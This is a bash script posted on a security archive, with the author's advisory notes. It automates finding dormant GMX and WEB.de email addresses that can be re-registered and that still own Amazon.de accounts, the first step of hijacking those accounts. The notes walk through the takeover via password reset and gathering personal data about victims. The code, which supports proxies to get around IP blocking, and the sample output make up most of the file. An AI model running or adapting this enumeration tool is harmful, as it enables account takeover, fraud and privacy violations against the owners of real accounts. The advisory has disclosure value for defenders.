Hippolyte is a shell script that automates the checking of inactive account hijacking possibilities for accounts that may be used elsewhere for access (ie. Amazon, etc).
1c0cc2c62ba866eb985107f9934f171a08c1a9c308b03ebae41c7f1d8555a69e#!/bin/bash
# hippolyte.sh - l0om
##############
# hippolyte has been written to be something like a proof-of-concept code for
# automate inactive-account-hijacking attack.
# in this special case we take care about Amazon and two common email serivce
# provider in germany: GMX and WEB.
# this program can refer to the following mail at securityfocus
# http://www.securityfocus.com/archive/1/503175
##############
# INACTIVE ACCOUNT HIJACKING
#
#author: l0om
#page: l0om.org
#date: 29.04.2009
#
#
#OVERVIEW:
#
#I would like to draw your attention on a problem that is already known and is surely exploited for a long time, but clearly seems to be underestimated.
#
#the problem is explained quickly:
#- email service provider delete inactive accounts after six or twelve months of inactivity and release the adresse (eg GMX, WEB)
#- many platforms such as amazon do NOT delete inactive accounts
#
#This asymmetry in handling inactive accounts has the consequence that thousands of accounts of various online platforms, like Amazon or eBay, can be hijacked by attackers without any technical difficulties.
#
#The procedure is so simple that it dont needs to be mentioned:
#- An attacker takes an old email address and try to register this email account at the email service provider.
#- If it can be registered, it is assumed that the account has been released (or has never existed).
#- Then the attacker tries at a variety of online platforms to create accounts for the just mentioned email address.
#- If the registration would be successful, there is no account for this email address at this online platform registered
#+ If the registration fails, because it already have an account there, there has been found a registered account for this email address and now its getting ugly.
#
#an attacker can hijack the account of the online platform if he simply register the email account and now uses the forgotten-the-password-function. the attacker gets a link which can be used to set a new password. Now he has the user data and the functions of the original owner in his control. sure, some platforms e.g. ebay wont sent you the password reset link 4 free like amazon. on ebay you first have to enter some information about your person like address or your birthday. the problem is that the requested information expect answers which may be found on the internet - just think about social networks in the internet like MySpace. with use of google and the victims email address the attacker may look up such information quick. finally some "usefull" aspects of sites like 123people.com....
#
#jeopardized are all possible online systems with such a forgotten-password-function in use.
#
#furthermore on holidays an attacker gets newsletter emails which lead the attacker to another accounts.
#
#
#AUTOMATIC:
#
#badass@evilhost:~$ ./hippolyte.sh -h
#
# Hippolyte
# Your Amazons are mine...
# written by l0om (who likes to have amazons too)
#
# hippolyte.sh < -f email-file [options] >
# options:
# -f: next argument the file with emails (seperated with \n)
# -l: next argument the logfiles name
# -v: verbose
# -p: next argument the full proxy (eg. "localhost:4001")
#
#badass@evilhost:~$ ./hippolyte.sh -f accounts -l output
#
# Hippolyte
# Your Amazons are mine...
# written by l0om (who likes to have amazons too)
#
#get vaild gmx sid...done
#get amazon cookies...done
#---------- come get my belt ----------
#check account censored-01@gmx.de at gmx.de
#check account censored-02@gmx.de at gmx.de
# GMX account censored-02@gmx.de is free to register
# checking censored-02@gmx.de at amazon...
# +++ possible account hijacking for censored-02@gmx.de at amazon.de
#check account censored-03@gmx.de at gmx.de
# GMX account censored-03@gmx.de is free to register
# checking censored-03@gmx.de at amazon...
# +++ possible account hijacking for censored-03@gmx.de at amazon.de
#check account censored-04@gmx.de at gmx.de
# GMX account censored-04@gmx.de is free to register
# checking censored-04@gmx.de at amazon...
# +++ possible account hijacking censored-04@gmx.de at amazon.de
#check account censored-05@gmx.de at gmx.de
#[...]
## END OF NOTES ##
# PARAMETERS:
# first: cookie filename
# second: full proxy (HTTPS)
# RETURN VALUES:
# none for now. writes cookies to filename
function get_web_cookie()
{
if test -z $2
then
curl -k "https://user.web.de/all.jsf" -c $1 1>/dev/null 2>/dev/null
else
curl -k -x $2 "https://user.web.de/all.jsf" -c $1 1>/dev/null 2>/dev/null
fi
}
# PARAMETERS:
# first: full proxy string like "127.0.0.1:4001"
# RETURN VALUES:
# returns new sid string
function get_gmx_sid()
{
if test -z $1
then
curl https://service.gmx.net/de/cgi/g.fcgi/tariff/new/freemail/instant/user -A 'Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.0.6) Gecko/2009020911 Ubuntu/8.10 (intrepid) Firefox/3.0.6' 1>test 2>/dev/null
else
curl -x $1 https://service.gmx.net/de/cgi/g.fcgi/tariff/new/freemail/instant/user -A 'Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.0.6) Gecko/2009020911 Ubuntu/8.10 (intrepid) Firefox/3.0.6' 1>test 2>/dev/null
fi
grep https test | awk -F'sid=' '{print $2}' | cut -f1 -d\"
}
#function checks the gmx account for beeing registrated or not
# PARAMETERS:
# first: GMX sid
# second: url encoded email addy (no @domain.td)
# third: email addy (no @domain.td)
# fourth: full proxy
# fifth: top level domain (eg. de, org, etc...)
# RETURN VALUES:
# 0 for NOT FREE account
# 1 for FREE account
# NOTE: here is no state "2" for unexpected behavoir returnd! this is kinda lame and should be fixed.
function check_gmx_account()
{
if test -z $4
then
curl -k "https://service.gmx.net/de/cgi/g.fcgi/misc/purifier/tariff/new/common/suggestaddress?sid=$1&wishname=$2&countryiso=$5" -A 'Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.0.6) Gecko/2009020911 Ubuntu/8.10 (intrepid) Firefox/3.0.6' 1>test 2>/dev/null
else
curl -x $4 -k "https://service.gmx.net/de/cgi/g.fcgi/misc/purifier/tariff/new/common/suggestaddress?sid=$1&wishname=$2&countryiso=$5" -A 'Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.0.6) Gecko/2009020911 Ubuntu/8.10 (intrepid) Firefox/3.0.6' 1>test 2>/dev/null
fi
#cat test >debug
res=`grep $3@gmx.$5 test | wc -l`
#echo $res >>debug
if test $res -eq 0
then
echo 0
else
echo 1
fi
}
# PARAMETERS:
# first: email-addy (no @domain.tld)
# second: cookiefile
# third: full proxy (HTTPS)
# RETURN VALUES:
# 0 for NOT FREE account
# 1 for FREE account
# 2 unexpected result (eg. WEB blocks the JAP proxy...)
function check_web_account()
{
if test -z $3
then
curl -k -b $2 "https://user.web.de/all.jsf" -d "step1%3Aprename=&step1%3Aname=&step1%3AstreetNo=&step1%3Aplz=&step1%3Acity=&step1%3Acountry=1&step1%3AdateOfBirth.day=&step1%3AdateOfBirth.month=&step1%3AdateOfBirth.year=&step1%3Ausername=$1&step1%3Aavailable=Verf%C3%BCgbarkeit+pr%C3%BCfen&step1%3Apasswd=&step1%3Apasswd2=&step1%3Achallenges=1&step1%3AsecAnswer=&step1%3Aemail=&step1%3Amobil=&step1%3AcaptchaAnswer=&step1_SUBMIT=1&step1%3A_link_hidden_=" 1>webtest 2>/dev/null
else
curl -k -b $2 -x $3 "https://user.web.de/all.jsf" -d "step1%3Aprename=&step1%3Aname=&step1%3AstreetNo=&step1%3Aplz=&step1%3Acity=&step1%3Acountry=1&step1%3AdateOfBirth.day=&step1%3AdateOfBirth.month=&step1%3AdateOfBirth.year=&step1%3Ausername=$1&step1%3Aavailable=Verf%C3%BCgbarkeit+pr%C3%BCfen&step1%3Apasswd=&step1%3Apasswd2=&step1%3Achallenges=1&step1%3AsecAnswer=&step1%3Aemail=&step1%3Amobil=&step1%3AcaptchaAnswer=&step1_SUBMIT=1&step1%3A_link_hidden_=" 1>webtest 2>/dev/null
fi
free=`grep "ist verfügbar." webtest | wc -l`
if test $free -eq 1
then
echo 1
exit;
fi
notfree=`grep "ist leider schon vergeben" webtest | wc -l`
if test $notfree -eq 1
then
echo 0
exit;
fi
echo 2 #unexpected... time to debug
}
#function returns nothing but saves needed cookies in cookies.txt
#parameters: full proxy string like "127.0.0.1:4001"
function get_amazon_cookies()
{
if test -z $1
then
curl -c cookies.txt http://www.amazon.de -A 'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4' 1>/dev/null 2>/dev/null
curl -c cookies.txt http://www.amazon.de -A 'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4' -b cookies.txt 1>/dev/null 2>/dev/null
else
curl -x $1 -c cookies.txt http://www.amazon.de -A 'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4' 1>/dev/null 2>/dev/null
curl -x $1 -c cookies.txt http://www.amazon.de -A 'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4' -b cookies.txt 1>/dev/null 2>/dev/null
fi
}
# return urlencoded parameter one
# parameters: string to encode
function my_urlencode()
{
echo -n $1 | od -t x1 -A n | tr " " % | tr '\n' " " | tr -d ' '
}
#function checks amazon.de for an existing account identified with email address XY
#parameters:
# first: url encoded email addy (full)
# second: full proxy
#returns 1 on a registered account and 0 for a FREE account
function check_amazon_account()
{
email=`my_urlencode $1`
post="__mk_de_DE=%C5M%C5Z%D5%D1&path=%2Fgp%2Fyourstore&useRedirectOnSuccess=1&query=signIn%3D1%26ref_%3Dpd_irl_gw&mode=&redirectProtocol=&pageAction=%2Fgp%2Fyourstore&disableCorpSignUp=&protocol=https&sessionId=276-7336171-5053721&referer=flex&email=$email&action=new-user&password=&x=137&y=7&metadata1=Firefox+3.0.4+Windows&metadataf1=&metadata2=Foxit+Reader+Plugin+for+Mozilla+Mozilla+Default+Plug-in+DivX+Web+Player+1427Adobe+Acrobat+QuickTime+Plug-in+7.5.5+NPMPDRM+License+Acquisition+Plugin+WMMPDRM+License+Acquisition+Wrapper+Active+Process+Information+eXchange+fluxDVD+Shockwave+Flash+90124iTunes+Application+Detector+DivX%AE+Content+Upload+Plugin+NPVeohVersion4+plugin+4VLC+Multimedia+Plugin+08619962007Java%28TM%29+Platform+SE+6+U7+16007%7C%7C1280-1024-996-32-*-*-*&metadata3=timezone%3A+-1+execution+time%3A+4"
if test -z $2
then
curl https://www.amazon.de/gp/flex/sign-in/select.html -d $post -b cookies.txt -A 'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4' -k >test 2>/dev/null
else
curl -x $2 https://www.amazon.de/gp/flex/sign-in/select.html -d $post -b cookies.txt -A 'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4' -k >test 2>/dev/null
fi
ret=`grep "Es existiert allerdings" test | wc -l`
if test $ret -eq 0
then
echo 0
else
echo 1
fi
}
function usage()
{
echo " hippolyte.sh < -f email-file [options] >"
echo " options:"
echo " -f: next argument the file with emails (seperated with \n)"
echo " -l: next argument the logfiles name"
echo " -v: verbose"
echo " -p: next argument the full proxy (eg. \"localhost:4001\")"
echo " -a: ring on possible account hijack"
}
toLower()
{
echo $1 | tr "[:upper:]" "[:lower:]"
}
#########################
######### Main ##########
#########################
#verbose=1
#proxy="localhost:4001"
printf "\n\tHippolyte\n"
printf "\tYour Amazons are mine...\n"
printf "\t\twritten by l0om (who likes to have amazons too)\n\n"
while [ "$1" != "" ]; do
case $1 in
-f | --file ) shift
emailfile=$1
;;
-v | --verbose )
verbose=1
;;
-a | --alert )
alert=1
;;
-p | --proxy ) shift
proxy=$1
;;
-l | --log ) shift
logfile=$1
date >$logfile
echo "" >>$logfile
;;
-h | --help ) usage
exit
;;
* ) usage
exit 1
esac
shift
done
if test -z $emailfile
then
echo THERE IS NO EMAIL FILE
usage
exit
fi
if test `grep -i '@web.' $emailfile | wc -l` -gt 0; then
echo -n get vaild WEB cookie...
get_web_cookie "webcookie.txt" $proxy
echo done
fi
if test `grep -i '@gmx.' $emailfile | wc -l` -gt 0; then
echo -n get vaild gmx sid...
gmxsid=`get_gmx_sid $proxy`
echo done
fi
echo -n get amazon cookies...
get_amazon_cookies $proxy
echo done
if [ ! -z $verbose ]
then
if [ ! -z $gmxsid ]
then
echo GMX sid is $gmxsid
fi
if [ -f "webcookie.txt" ]
then
echo WEB cookies
cat webcookies.txt
fi
echo AMAZON cookies
cat cookies.txt
fi
echo "---------- come get my belt ----------"
for i in `cat $emailfile`; do
i=`toLower $i`
case $i in
*@gmx.*)
echo check account $i at gmx.de
email=`echo $i | cut -f1 -d@`
email_encoded=`my_urlencode $email`
email_toplevel=`echo $i | awk -F"@gmx." '{print $2}'`
let "j=j+1"
if test $j -eq 5 #every fifth try get new SID
then
j=1
echo -n get vaild gmx sid...
gmxsid=`get_gmx_sid $proxy`
echo done
if [ ! -z $verbose ]
then
echo GMX sid is $gmxsid
fi
fi
account=`check_gmx_account $gmxsid $email_encoded $email $proxy $email_toplevel`
;;
#gmx account is 0 for NOT FREE
# is 1 for FREE
*@web.*)
echo "check account $i at web.de... "
email=`echo $i | cut -f1 -d@`
account=`check_web_account $email "webcookie.txt" $proxy`
#check for blocked ip...
if test $account -eq 2; then
if test `grep '/reject_ip/' webtest | wc -l` -gt 0; then
echo " WEB has blocked your ip"
if [ ! -z $logfile ]
then
echo " WEB has blocked your ip" >>$logfile
fi
fi
fi
;;
#web account is 0 for NOT FREE
# is 1 for FREE
# is 2 for unexpected behavoir
[*])
echo "i dont know how to handle the email serivce provider of $i"
;;
esac
if test $account -eq 2 #ACCOUNT STATE = 2 -> unexpected
then
echo " WARNING: unexpected behavoir - loop"
continue
fi
#echo $email
if test $account -eq 1 #ACCOUNT STATE = 1 -> FREE
then
echo " account $i is free to register"
if [ ! -z $logfile ]
then
echo "account $i is free to register" >>$logfile
fi
echo " checking $i at amazon..."
if test `check_amazon_account $i $proxy` -eq 1
then
echo " +++ possible account hijacking for $i at amazon.de"
if [ ! -a $alert ]
then
echo -e '\a'
fi
if [ ! -z $logfile ]
then
echo "possible account hijacking for $i at amazon.de" >>$logfile
fi
else
echo " no amazon account registerd for $i"
fi
else #ACCOUNT STATE = 0 -> NOT FREE
echo " account is not free"
fi
done
rm -f webtest
rm -f cookies.txt
rm -f "webcookie.txt"
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed